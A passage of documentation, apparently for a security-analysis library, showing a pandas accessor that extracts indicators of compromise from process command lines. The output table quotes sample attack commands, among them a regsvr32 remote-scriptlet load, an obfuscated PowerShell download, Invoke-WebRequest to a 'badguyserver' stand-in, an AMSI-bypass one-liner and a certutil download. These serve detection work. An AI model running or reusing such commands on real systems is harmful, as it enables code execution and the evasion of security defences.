The extraction functionality is also available as a pandas extension, `mp_ioc`. This supports a single method, `extract()`, which accepts the same syntax as `extract` (described earlier). The example below invokes it through the `mp` accessor as `ioc_extract`.
# Same extraction through the pandas accessor; columns= works as for extract().
accessor_iocs = process_tree.mp.ioc_extract(columns=['CommandLine'])
accessor_iocs
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | dns | microsoft.com | 24 | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... |
1 | url | http://server/file.sct | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | dns | server | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
3 | dns | evil.ps | 35 | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | dns | blah.ps | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
7 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
8 | dns | blah.ps | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
9 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
10 | md5_hash | 81ed03caf6901e444c72ac67d192fb9c | 44 | implant.exe 81ed03caf6901e444c72ac67d192fb9c |
11 | url | http://badguyserver/pwnme | 46 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
12 | dns | badguyserver | 46 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
13 | url | http://badguyserver/pwnme | 47 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
14 | dns | badguyserver | 47 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
15 | dns | Invoke-Shellcode.ps | 48 | .\powershell Invoke-Shellcode.ps1 |
16 | dns | Invoke-ReverseDnsLookup.ps | 49 | .\powershell Invoke-ReverseDnsLookup.ps1 |
17 | dns | Wscript.Shell | 67 | cmd /c C:\Windows\System32\mshta.exe vbscript:CreateObject("Wscript.Shell").Run(".\powershell.e... |
18 | url | http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | 77 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
19 | dns | system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | 77 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
20 | ipv4 | 1.2.3.4 | 78 | netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\b... |
21 | dns | wscript.shell | 81 | cmd /c "powershell wscript.shell used to download a .gif" |
22 | dns | abc.com | 90 | c:\Diagnostics\UserTmp\ransomware.exe @ abc.com abc.wallet |
23 | ipv4 | 127.0.0.1 | 102 | certutil -urlcache -split -f http://127.0.0.1/ |
24 | url | http://127.0.0.1/ | 102 | certutil -urlcache -split -f http://127.0.0.1/ |